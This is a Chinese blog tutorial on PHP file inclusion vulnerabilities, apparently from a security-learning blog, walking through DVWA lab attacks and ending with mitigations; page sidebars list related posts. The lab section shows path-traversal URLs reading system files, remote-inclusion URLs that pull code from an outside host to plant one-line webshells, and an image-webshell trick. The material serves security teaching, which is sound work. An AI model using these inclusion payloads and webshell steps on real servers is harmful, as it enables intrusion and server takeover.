文件包含漏洞详谈

最新推荐文章于 2025-08-05 09:00:00 发布
原创 最新推荐文章于 2025-08-05 09:00:00 发布 · 208 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#技术贴

文件包含

将重复使用的函数写到单个文件中,需要使用某个函数时,调用这个文件即可,这种文件调用过程称为文件包含

 

文件包含漏洞

程序开发人员希望代码更灵活,将包含的文件设置为变量,用来进行动态调用,导致客户端可以调用一个恶意文件,造成文件包含漏洞

分为:本地文件包含漏洞和远程文件包含漏洞

 

文件包含漏洞成因

网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了包含功能),攻击者可以通过修改包含文件的位置来让后台执行任意文件

 

 

文件包含函数

include() 执行到include时才包含文件,找不到被包含文件时提示警告,但脚本会继续执行

require() 只要程序已运行就包含文件,找不到被包含的文件时就会产生严重错误,并停止脚本运行

 

 

dvwa文件包含实验

本地文件包含

http://127.0.0.1:8086/dvwa/vulnerabilities/fi/?page=file1.php

将参数值换为本地的文件,发送请求:

http://127.0.0.1:8086/dvwa/vulnerabilities/fi/?page=c:\windows\system32\drivers\etc\hosts

发现成功读取本地文件

http://127.0.0.1:8086/dvwa/vulnerabilities/fi/?page=file://c:\windows\system32\drivers\etc\hosts

此时参数是一个file协议,一样可以成功读取

 

远程文件包含

首先修改php.ini文件中的配置(重点)

allow_url_fopen = On 默认打开,其他都是默认关闭

allow_url_include = On

magic_quotes_gpc = off

http://127.0.0.1:8086/dvwa/vulnerabilities/fi/?page=http://192.168.101.133/fileinclude/info.txt

得到当前系统的敏感信息

 

http://127.0.0.1:8086/dvwa/vulnerabilities/fi/?page=http://192.168.101.133/fileinclude/cmd.txt

会在本地的fi文件夹中生成一个cmd250.php文件,文件内容为一句话木马

然后http://127.0.0.1:8086/dvwa/vulnerabilities/fi/cmd250.php?cmd=ipconfig,控制当前系统的服务器

 

http://127.0.0.1:8086/dvwa/vulnerabilities/fi/?page=http://192.168.101.133/fileinclude/filein1.txt

会在本地的fi文件夹中生成一个newfile1.php文件,文件内容为一句话木马,使用菜刀,添加shell,地址栏里输入http://127.0.0.1:8086/dvwa/vulnerabilities/fi/newfile1.php,密码为123,添加成功后双击该shell,发现获得了系统的C盘与D盘

 

文件包含结合文件上传

在cmd中,先切到所执行文件的路径下,执行copy /b 001.png + muma.php new001.png 会生成一个新的包含木马的图片文件new001.png,切换到高级别,进行文件上传,将生成的木马图片文件上传,拷贝成功上传提醒前面的文件相对路径,切换到低级,使用生成的图片文件进行文件包含,也就是将参数改为之前拷贝的相对路径,发送请求

 

cookie文件包含

发送请求 127.0.0.1:8086/fileinclude/cookiein,抓包,将cookie值改为 temp=..\..\windows\system32\drivers\etc\hosts,重放请求,发现文件执行成功

 

第五行代码中的路径为任意路径

 

 

文件包含漏洞防范:

1 尽量硬编码文件名称,如aaa.php,不要以变量的形式动态变化

2 过滤:http:// , https:// , ../../等

3 配置文件php.ini中的三个开关都设为关闭

4 采用白名单方式,未出现在白名单中的一律禁止

文件包含漏洞
qq_51553814的博客
09-13 479
关于文件包含漏洞,我觉得和ssrf漏洞有点儿像,ssrf漏洞是通过curl()函数获取信息但是没有进行过滤,从而访问到内网造成危害,文件包含漏洞则是通过include()函数获取文件,攻击者输入敏感文件导致敏感文件也被输出从而产生危害。 原理 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文
SSRF漏洞笔记
weixin_42695055的博客
02-08 710
SSRF:(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造特殊形成的请求,并且由指定服务器端发起恶意请求的一个安全漏洞。 由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。
Hardening Docker containers and hosts against vulnerabilities: a security toolkit
omnispace的博客
03-20 713
IntroductionContainer technology has radically changed the way that applications are being developed and deployed. Notably, containers dramatically ease dependency management, so shipping new features...
file include 文件包括漏洞,毒化日志,并生成木马,执行系统命令 dvwa低安全
gwl7878的博客
06-28 1015
root@kali:/var/log/apache2#ls -lh 总用量 2.4M -rw-rw-r-- 1root root    1 6月  28 15:50 access.log   日志毒化: nc172.19.180.27 80 GET/hazStarthazEnd HTTP/1.1   root@kali:/var/log/apache2#cat access.log
文件上传详谈
m0_56691564的博客
10-29 1660
文件上传漏洞是指文件上传功能`没有对上传的文件做合理严谨的过滤`,导致用户可以利用此功能,上传能`被服务端解析执行的文件`,并通过此文件获得`执行服务端命令的能力`。
03-Weblogic漏洞
qq_57410330的博客
07-26 1855
全名:Oracle WebLogic Server,JavaEE服务器商业产品,适用于大型商业项目同类产品:IBM WebSphere、Apache Tomcat、Redhat Jboss7001。
详谈SSRF与CSRF区别
唯以的博客
03-11 5905
CSRF (Cross-site request forgery,跨站请求伪造),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF称跨站请求伪造,XSS就是CSRF中的一种。二者区别,XSS利用的是用户对指定网站的信任,CSRF利用是网站对用户浏览器的信任。 发生条件 当用户在安全网站A登录后保持登录的状态,并在此时浏览了保存有恶意代码的另一个网站B。此时B站劫持用户的浏览器并以用户以登录的状态对A站发送非用户本人的操作。当服务端没有对这次
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
weixin_39968724的博客
03-16 1160
0x01什么是PHP序列化与反序列化PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列化将对象按照一定格式转化为字符串的形式来进行传输简单...
http协议详谈
chongfufu5765的博客
07-10 445
scheme- 定义因特网服务的类型。最常见的类型是 httphost- 定义域主机(http 的默认主机是 www)domain- 定义因特网域名,比如 runoob.comport- 定义主机上的端口号(http 的默认端口号是 80)path- 定义服务器上的路径(如果省...
详谈PHP文件目录基础操作
10-25
不当的文件操作可能会引发安全漏洞,如文件包含、文件上传等问题,因此在实际应用中要格外小心。开发者应该编写健壮的代码,对文件操作进行适当的权限检查和异常处理,确保应用程序的安全性和稳定性。 总之,文件...
警惕!截止2024年Dell iDRAC 漏洞大曝光,您的远程管理是否安全?
最新发布
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
08-05 1227
警惕!截止2024年Dell iDRAC 漏洞大曝光,您的远程管理是否安全?
详谈pyaotowin的使用
03-28
Pyaotowin对象包含了一些常用的Windows渗透测试方法,可以直接调用。实例化代码如下: ``` ptw = Pyaotowin() ``` 4. 执行Windows命令 使用Pyaotowin可以在目标系统上执行Windows命令,代码如下: ``` ptw.run_...
详谈HTTP和HTTPS的加密
长岛冰茶去冰的博客
03-22 8654
详细介绍HTTP协议并讲述自己所理解的HTTPS加密,如有理解不对或不全面的地方,希望大家指正!
渗透测试 信息收集 详细分析
m0_45308313的博客
02-18 541
渗透测试 信息收集 详细分析信息收集信息收集手段被动信息收集主动信息收集信息收集阶段要做什么?域名子域名子目录真实物理路径真实ip真实ip段旁站后台端口服务操作系统cms(指纹)waf防火墙社工库其他信息收集的实现(重点)Google Hack or Baidu Hackcdn判断及绕过子域名获取子目录及真实路径及旁站的探测web框架及操作系统及服务信息cms查询端口扫描whois特殊工具详解篇dignetdiscoverfpingnmapsnmpwalkwafw00f 信息收集 信息收集手段 信息收集的手
宽字节注入原理与防御
wtf0712的博客
11-06 7738
gbk编码原理 一个字符占1个字节 两个字节以上叫宽字节 设置“set character_set_client=gbk”(gbk编码设置),通常导致编码转换的注入问题,尤其是使用php连接mysql数据库的时候 一个gbk汉字占两个字节,取值范围是(编码位数):第一个字节是(129-254),第二个字节(64-254) 当设置gbk编码后,遇到连续两个字节,都符合gbk取值范围,会自动...
文件上传漏洞原理及防御
wtf0712的博客
11-06 6306
文件上传漏洞是指:用户上传了一个可执行的脚本文件,并通过该文件获得了执行服务端命令的权限   文件上传漏洞测试过程: 1 进行正常的上传,期间可抓包查看 2 尝试上传不同类型的恶意脚本文件,如JSP PHP文件等 3 查看是否在前端做了上传限制,如大小,格式,并尝试进行绕过 4 利用报错或者猜测等方式获得木马路径,访问   dvwa文件上传漏洞演示: 1 绕过大小限制 通过fi...
XML注入、XXE、XPath注入原理与防御
wtf0712的博客
11-06 4393
XML:可扩展标记语言,用来传输数据和存储数据,它的标签没有被定义,需要自行定义标签 是W3C的推荐标准   XML与HTML的差异 XML用来传输和存储数据,其焦点是数据的内容 HTML用来显示数据,其焦点是数据的外观   XML基本构造   XML注入是通过改写xml的数据内容来实现的   <USER role="guest">User1</...
CSRF漏洞原理与防御
wtf0712的博客
11-06 843
CSRF(跨站请求伪造) 攻击者盗取受害者的cookie凭证,以受害者的名义发送恶意请求,对服务器来说这个请求完全是合法的,让受害者亲自去执行攻击者所布置的操作,且真个过程受害者不会察觉   CSRF漏洞成因:网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,之后只要访问这个网站,都会默认你已经登录的状态。在此期间,攻击者发送了构造好的csrf脚本,或包含csrf脚本的链接...
网站挂马加密与解密
wtf0712的博客
11-06 736
网站挂马是指:黑客通过入侵或者其他方式控制了网站的权限,在网站的web页面中插入网马,用户在访问被挂马的网站时也会访问黑客构造的网马,网马再被用户浏览器访问是就会利用浏览器或者相关插件的漏洞,下载并执行恶意软件。 挂马流程: 制作木马------木马免杀------制作网页木马------入侵网站------植入网页木马-----网页浏览者遭受攻击   框架挂马 <iframe s...
标准io和文件io详谈
04-28
<think>嗯,用户想了解标准IO和文件IO的区别及详细使用方法。我需要先回顾一下相关知识,确保自己理解正确。根据提供的引用内容,标准IO是C库函数,比如fopen、fclose这些,而文件IO是系统调用,比如open、read、write。区别主要在于缓冲机制和应用层与内核层的交互。 首先,标准IO有缓冲区,数据先存到应用层的缓冲区,等满了或者满足条件时才调用系统调用写入内核缓冲区。这样可以减少系统调用的次数,提高效率。而文件IO每次操作都是直接系统调用,没有缓冲,适合需要实时读写的场景,比如设备文件或者网络套接字。 接下来,用户可能想知道具体的使用方法,比如函数列表和例子。需要分别列出标准IO和文件IO常用的函数,比如fopen对应open,fread对应read等。同时,要说明它们的参数和用法差异,比如标准IO用FILE指针,文件IO用文件描述符。 另外,用户可能关心它们的适用场景。比如标准IO适合普通文件操作,尤其是需要频繁读写的情况,而文件IO适合底层操作或者特殊文件类型。需要结合引用中的例子,比如标准IO的缓冲区大小如何计算,以及文件IO如何直接操作设备文件。 还要注意用户可能的误区,比如标准IO和文件IO是否可以混用。需要提醒他们避免混用,因为缓冲机制可能导致数据不一致。此外,错误处理的方式也不同,标准IO用ferror,文件IO用errno。 最后,生成相关问题时要覆盖性能分析、缓冲区设置、实际应用例子、错误处理和适用场景比较。这样用户可以根据问题进一步深入学习。</think>### 标准IO与文件IO的区别及详细使用方法 #### 一、核心区别 1. **层级与封装关系** - **标准IO**:应用层C库函数(如$fopen$, $fread$),对文件IO进行封装,自带缓冲机制[^1][^2] - **文件IO**:系统级调用(如$open$, $read$),直接操作内核接口,无缓冲[^1][^2] 2. **缓冲机制** - **标准IO**: - 全缓冲:默认模式,缓冲区满或调用$fflush$时触发系统调用 - 行缓冲:终端设备专用(如$stdout$),遇换行符或缓冲区满时触发 - 无缓冲:$stderr$等特殊场景[^3] - **文件IO**:无缓冲,每次调用$write$立即写入内核缓冲区 3. **性能对比** - 标准IO通过减少系统调用次数提升效率(例如连续写入10次数据仅触发1次$write$)[^1] - 文件IO适合实时性要求高的场景(如设备驱动开发) #### 二、具体使用对比 | 操作类型 | 标准IO函数 | 文件IO函数 | 参数差异 | |----------|-------------------------|----------------|------------------------| | 打开文件 | `FILE *fopen()` | `int open()` | 权限模式、返回值类型不同 | | 读取数据 | `size_t fread()` | `ssize_t read()` | 需指定FILE指针 vs 文件描述符 | | 写入数据 | `size_t fwrite()` | `ssize_t write()` | 标准IO含缓冲,文件IO直接操作 | | 关闭文件 | `int fclose()` | `int close()` | 释放资源逻辑不同 | **标准IO示例:** ```c FILE *fp = fopen("test.txt", "w"); if(fp) { fwrite("Hello", 1, 5, fp); // 数据暂存应用层缓冲区 fclose(fp); // 触发实际写入 } ``` **文件IO示例:** ```c int fd = open("test.txt", O_WRONLY|O_CREAT, 0644); if(fd != -1) { write(fd, "Hello", 5); // 立即写入内核缓冲区 close(fd); } ``` #### 三、选型指南 1. **优先标准IO的场景** - 普通文件读写(文本/二进制) - 需要格式输入输出(如`fprintf`) - 频繁小数据量操作 2. **必须用文件IO的场景** - 设备文件操作(如`/dev`目录下设备) - 需要文件锁定(`fcntl`) - 非阻塞IO或异步IO操作 #### 四、注意事项 1. **避免混用**:同一文件不应同时使用两种IO方式,可能导致缓冲数据丢失 2. **错误处理**: - 标准IO通过`ferror()`检测错误 - 文件IO通过`errno`全局变量获取错误码 3. **缓冲区控制**:可通过`setvbuf()`修改标准IO缓冲策略[^3]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值